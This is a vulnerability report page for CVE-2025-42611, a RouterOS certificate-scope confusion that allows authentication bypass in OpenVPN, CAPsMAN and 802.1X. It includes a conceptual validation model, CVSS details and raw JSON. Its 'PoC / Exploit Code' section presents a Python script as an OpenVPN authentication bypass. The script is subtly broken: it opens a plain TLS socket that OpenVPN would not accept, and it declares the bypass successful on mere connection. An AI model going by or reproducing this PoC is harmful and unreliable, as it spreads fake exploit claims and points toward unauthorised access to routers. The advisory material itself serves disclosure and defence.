Security Vulnerability Report
CVE-2025-42611 CVSS 6.5 MEDIUM

CVE-2025-42611

Published: 2026-05-05 11:16:32
Last Modified: 2026-05-07 14:51:54
Source: a6d3dc9e-0591-4a13-bce7-0f5b31ff6158

Description

RouterOS provides various services that rely on correct verification of client and server certificates to secure confidentiality and integrity of communications. This includes OpenVPN, CAPsMAN, Dot1x (802.1X), among others. The vulnerability lies in shared certificate validation logic which uses the system certificate store that is shared and equally trusted by all system services. This causes confusion of scope, allowing any certificate authority present in the system-wide trust store to be trusted in any context (with some exceptions), allowing partial or full authentication bypass in CAPsMAN, OpenVPN, Dot1X and potentially others.
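A conceptual model of the scope confusion described above, added here as an illustration; it is not RouterOS code and not code from the advisory. The CA names, keys and service-to-CA mapping are constructed assumptions, and an HMAC stands in for a real X.509 signature.

```python
import hashlib
import hmac
from dataclasses import dataclass

@dataclass(frozen=True)
class Cert:
    subject: str
    issuer: str
    sig: bytes  # HMAC stand-in for the issuer's signature (not real X.509)

def _mac(key, subject):
    return hmac.new(key, subject.encode(), hashlib.sha256).digest()

def issue(ca_name, ca_key, subject):
    """Issue a model certificate for `subject` under the named CA."""
    return Cert(subject, ca_name, _mac(ca_key, subject))

def signed_by(cert, anchors):
    """True if the cert's issuer is in `anchors` and its signature verifies."""
    key = anchors.get(cert.issuer)
    return key is not None and hmac.compare_digest(_mac(key, cert.subject), cert.sig)

# Constructed system-wide store: CAs imported for different purposes, held together.
SYSTEM_STORE = {"vpn-ca": b"k-vpn", "capsman-ca": b"k-capsman",
                "dot1x-ca": b"k-dot1x", "web-ca": b"k-web"}
# Hypothetical per-service scope: the only anchors each service should accept.
SERVICE_SCOPE = {"openvpn": {"vpn-ca"}, "capsman": {"capsman-ca"}, "dot1x": {"dot1x-ca"}}

def validate_shared(cert, service):
    """Flawed pattern: every anchor in the system store is trusted in every context."""
    return signed_by(cert, SYSTEM_STORE)  # `service` is ignored; that is the flaw

def validate_scoped(cert, service):
    """Hardened pattern: only anchors assigned to this service are consulted."""
    allowed = {n: k for n, k in SYSTEM_STORE.items() if n in SERVICE_SCOPE.get(service, set())}
    return signed_by(cert, allowed)

def cross_scope_accepts(certs):
    """(subject, service) pairs the shared check accepts but the scoped check rejects."""
    return [(c.subject, s) for c in certs for s in SERVICE_SCOPE
            if validate_shared(c, s) and not validate_scoped(c, s)]

# Constructed sample credentials: a VPN client, a cert from an unrelated CA, a forgery.
SAMPLE = [issue("vpn-ca", b"k-vpn", "laptop-01"),
          issue("web-ca", b"k-web", "unrelated-host"),
          Cert("forged", "vpn-ca", b"\x00" * 32)]

if __name__ == "__main__":
    for subject, service in cross_scope_accepts(SAMPLE):
        print(f"{subject}: accepted for {service} only because the store is shared")
```

Every pair the audit function returns is a credential that a shared store authenticates outside the context its CA was installed for; the forged certificate is rejected by both checks because its signature fails.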

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

RouterOS (for the specific affected versions, refer to the vendor advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC concept: Authenticating to RouterOS OpenVPN using a cert signed by a generic trusted CA
# This requires a RouterOS vulnerable to CVE-2025-42611 and a trusted public CA cert.
import socket
import ssl


def attempt_vpn_bypass(target_ip, port, cert_file, key_file):
    # Create a standard SSL socket
    context = ssl.create_default_context()
    # Load the certificate signed by a public/trusted CA present in RouterOS system store
    context.load_cert_chain(certfile=cert_file, keyfile=key_file)
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        # Wrap socket with SSL
        secure_sock = context.wrap_socket(sock, server_hostname=target_ip)
        secure_sock.connect((target_ip, port))
        print(f"[+] Connection established to {target_ip}:{port}")
        print("[+] Certificate verified by RouterOS using system-wide trust store.")
        print("[+] Authentication bypassed / Successful.")
        secure_sock.close()
        return True
    except Exception as e:
        print(f"[-] Connection failed: {e}")
        return False


# Example usage:
# attempt_vpn_bypass('192.168.88.1', 1194, 'public_ca_signed.crt', 'private.key')
```

References

https://www.cert.si/en/cve-2025-42611/

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-42611", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-05T11:16:31.827", "lastModified": "2026-05-07T14:51:53.657", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "RouterOS provides various services that rely on correct\nverification of client and server certificates to secure confidentiality and\nintegrity of communications. This includes OpenVPN, CAPsMAN, Dot1x (802.1X),\namong others.\n\n\n\nThe vulnerability lies in shared certificate validation\nlogic which uses the system certificate store that is shared and equally\ntrusted by all system services. This causes confusion of scope, allowing any\ncertificate authority present in the system-wide trust store to be trusted in\nany context (with some exceptions), allowing partial or full authentication\nbypass in CAPsMAN, OpenVPN, Dot1X and potentially others."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "references": [{"url": "https://www.cert.si/en/cve-2025-42611/", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}